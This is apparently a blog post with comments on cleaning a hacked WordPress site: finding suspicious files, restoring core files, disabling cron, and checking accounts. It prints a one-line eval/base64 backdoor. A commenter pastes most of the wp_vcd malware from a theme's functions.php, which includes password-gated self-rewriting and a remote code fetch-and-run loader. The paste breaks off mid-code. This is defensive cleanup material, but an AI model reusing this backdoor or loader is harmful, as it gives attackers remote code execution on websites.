In January, one of my website was hacked. The symptom was when I access the website, it only show a white screen in the browser. I didn’t pay much attention on that, just restore the whole website from a early backup. However, it was just the beginning of the nightmare. After one month, all my websites were hacked on the same share hosting. Now it becomes a serious problem. And two of my websites are already marked as “Malware code injection”. Then my cleaning hacked WordPress website journey is beginning.
How to Clean Hacked WordPress Website
All hacked websites are powered by WordPress. I think it will be very helpful if I share my experience about how to find out the hack files in WordPress website. Actually, there are several steps to find hack code and clean hacked WordPress Website.
Find Suspicious Files in WordPress Website
To clean a hacked WordPress website, the step 1 is finding all suspicious files in hacked WordPress website. If you are familiar with WordPress, it will be very easy to find suspicious files in WordPress website. If you are not familiar with WordPress, you can download the latest version of WordPress and then compare files with your hacked WordPress website. In my website, I find there is a file named “wp-tmp.php” in the root folder. This is the most common way in which hacker hide their backdoor script.
Suspicious file wp-tmp.php in Hacked WordPress Website
The “wp-tmp.php” looks very similar with other WordPress files, such as “wp-login.php”, “wp-settings.php”. However, “wp-tmp.php” is definitely a backdoor where hackers will use this file to access your WordPress website and inject malware in your website. The “wp-tmp.php” looks like this:
<?php $p = $_REQUEST["m"]; eval(base64_decode($p)); ?>
Backdoor in WordPress Uploads Folder
Step 2 to clean hacked WordPress website is searching harmful code in uploads folder. The “wp-content/uploads” folder in WordPress is another place where hackers like to put their malware code. Because the uploads folder contains all media files we upload to our website, we will not delete this folder when we clean the hacked website. So when you are cleaning a hacked WordPress site, you must search this folder to check if there are some php files inside.
Clean a Hacked WordPress Site in 5 Minutes
Step 3 to clean hacked WordPress site is deleting all hacked files. After I find all suspicious files in hacked WordPress Website, simply deleting these files is not enough. Many hackers like to change WordPress system file to inject some harmful code inside. This type of hacked files is very hard to find and clean. So the best way to clean your hacked WordPress website is deleting all WordPress system files, and backup the “wp-content” folder and “wp-config.php” file in root folder.
Restore Clean WordPress System Files
Step 4 is restoring WordPress system files. This step is quite simple. I download the latest WordPress source code from wordpress.org and copy all WordPress files to my website. Please remember to upload your own “wp-content” folder and “wp-config.php” file which you backup in step 3.
Stop WordPress Cron Job
Step 5 is stoping cron job in WordPress. Though this step may not be necessary, it is better to keep your website safe. As my clean hacked WordPress experience, some sophisticated hackers will hide their injection code in database and use WordPress cron job to run this harmful code, then hacked your WordPress website again.
To stop cron job in WordPress, you can edit the “wp-config.php” file:
define('DISABLE_WP_CRON', 'true');
Another way to stop cron job is rename the “wp-cron.php” file or delete it. In my website, I take both of above actions.
Ask Google to Review Your Website
If your hacked website is already marked as malware website by google, you have to ask google to review your website. First, you can register to Google webmaster. For more information, you can check this Google official document:
About malware, hacking, and infected sites
Prevent Your Website Being Hacked
After you clean the hacked WordPress site successfully, you should keep watching on the website at least for 2 or 3 days. Hackers will try their best to hack your website again when they find they lose the control of your website. Therefore, it is very important to check the raw access log of your website. If your website is hacked again, at least you will find where hackers walk in your website. Then you just repeat the above steps and close the backdoor. Therefore, you should keep watching the access log until there is no suspicious access. Here is my raw access log example. The website was hacked again after I clean my hacked WordPress website. So I delete all WordPress system files and stop my cron job in WordPress.
Avoid Brute Force Login
Brute force attack is the most common way to hack website to get username and password. Lots of people use some brute force attack web service to attack WordPress powered website to get the admin username and password. Here is how it looks like in access log:
To keep our website safe, we must take some actions to protect our website. Here is an article to talk about how to avoid login page brute force attack.
Delete Unknown Account
What’s the simplest back door in a hacked website? The answer is an administrator account. That’s right. Please really don’t forget to check if there are unusual account in your website. It is very simple to check it. Just go to your website backend and check the account list. Delete all unnecessary accounts you don’t need.
Change Your Administrator Password
When your website is compromised, your username and password may already leak out. In my hacked WordPress website, the file “wp-includes/user.php” is injected with hacked code. I guess this injected hack code will get all plain user name and password when we try to login with our username and password. Therefore, the last step to clean up your website is changing your administrator password.
seems like one of my client’s have the same problem, with the same attacker (at least the IP came from the same network, HostSailor NL)
Oh, really. In my website, the hacker left lots of php files in wp-include folder and wp-admin folder. All these hack file name looks like “edit_.php”, “user_.php”.
so what was your back door? You never do mention how they got the wp-tmp.php file on your machine in the first place.
I guess the back door maybe in the cron job in database, as my website was hacked again even I replace all wp files with new fresh one.
I watch the log file. At the beginning, the hacker try to access the wp-tmp.php and he get 404 error. Once my website do wordpress cron job, and after that, the hacker’s wp-tmp.php is back.
So I guess the hack inject the hack code in the cron job in wordpress, so I disable wordpress cron job, and delete the cron script completely.
Currently, my website is running, but I can still see hacker try to break it. Quite scare.
i have tablet dragon touch E70 i can not open t beucase there is message that adulate browser has stop so prevent to contnue open the tablet i had tried many tmes reset the device to he factory and tried to formate but the same the device locked please help
You’d better to contact with customer support. I never meet this problem.
Hllo i have similar problems. Even if i delete the 2 files wp-tmp.php wp-feed.php after one minute they appear again. I don t want to do
The hacker already put some backdoor script in your website, which may hidden in normal wordpress script or theme script.
I have the same problem, the file regenerate automatically.
I tried to clean the files reinstalling the wp-includes and wp-admin folders.
I also deleted the wp-cron.php file
Can’t find a solution right now. Did you?
It’s highly possible the hacking code is hiding in plugin file or theme file. That’s why all problem files are regenerated automatically. Last time, I found the walware code in my theme file.
Since i can’t recognize and find the malware i will have to delete everything and make a new install of wordpress, them and every single plugin from a fresh install.
I found a temporary solution to avoid the script to recreate themselves. I created 2 new files named “wp-tmp,php” and “wp-feed.php” with no code inside. Then i deleted the 2 respective files in the my folder server, and i quickly uploaded my 2 files in the same folder so that they can’t be recreated by the malware since they already exist.
I found the solution, look for the functions.php in your theme folder. Open it and delete the first part of code that is hacked.
(also google the word “go.pub2srv.com” to find more solutions)
This is the code:
<?php
if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == '35160fd9ce44b4c2a1c074cd994bf65a'))
{
$div_code_name="wp_vcd";
switch ($_REQUEST['action'])
{
case 'change_domain';
if (isset($_REQUEST['newdomain']))
{
if (!empty($_REQUEST['newdomain']))
{
if ($file = @file_get_contents(__FILE__))
{
if(preg_match_all('/\$tmpcontent = @file_get_contents\("http:\/\/(.*)\/code\.php/i',$file,$matcholddomain))
{
$file = preg_replace('/'.$matcholddomain[1][0].'/i',$_REQUEST['newdomain'], $file);
@file_put_contents(__FILE__, $file);
print "true";
}
}
}
}
break;
case 'change_code';
if (isset($_REQUEST['newcode']))
{
if (!empty($_REQUEST['newcode']))
{
if ($file = @file_get_contents(__FILE__))
{
if(preg_match_all('/\/\/\$start_wp_theme_tmp([\s\S]*)\/\/\$end_wp_theme_tmp/i',$file,$matcholdcode))
{
$file = str_replace($matcholdcode[1][0], stripslashes($_REQUEST['newcode']), $file);
@file_put_contents(__FILE__, $file);
print "true";
}
}
}
}
break;
default: print "ERROR_WP_ACTION WP_V_CD WP_CD";
}
die("");
}
$div_code_name = "wp_vcd";
$funcfile = __FILE__;
if(!function_exists('theme_temp_setup')) {
$path = $_SERVER['HTTP_HOST'] . $_SERVER[REQUEST_URI];
if (stripos($_SERVER['REQUEST_URI'], 'wp-cron.php') == false && stripos($_SERVER['REQUEST_URI'], 'xmlrpc.php') == false) {
function file_get_contents_tcurl($url)
{
$ch = curl_init();
curl_setopt($ch, CURLOPT_AUTOREFERER, TRUE);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
$data = curl_exec($ch);
curl_close($ch);
return $data;
}
function theme_temp_setup($phpCode)
{
$tmpfname = tempnam(sys_get_temp_dir(), "theme_temp_setup");
$handle = fopen($tmpfname, "w+");
fwrite($handle, "<?php
Thank You So much it works
Also look in the database for “wp-tmp” and you’ll find some other string in the options table to remove
Your experience will be greatly helpful!!!
Grazie per la soluzione!
This occurs by using NULLED themes and plugins
You have to know that everything nulled is contaminated by malicious code.
When Nulled is installed, the code wakes up at a certain moment, goes through all the folders of your hosting, and installs a script in addition to adding several files.
wp-vcd.php
wp-tmp.php:
AND ALSO modifies
post.php
functions.php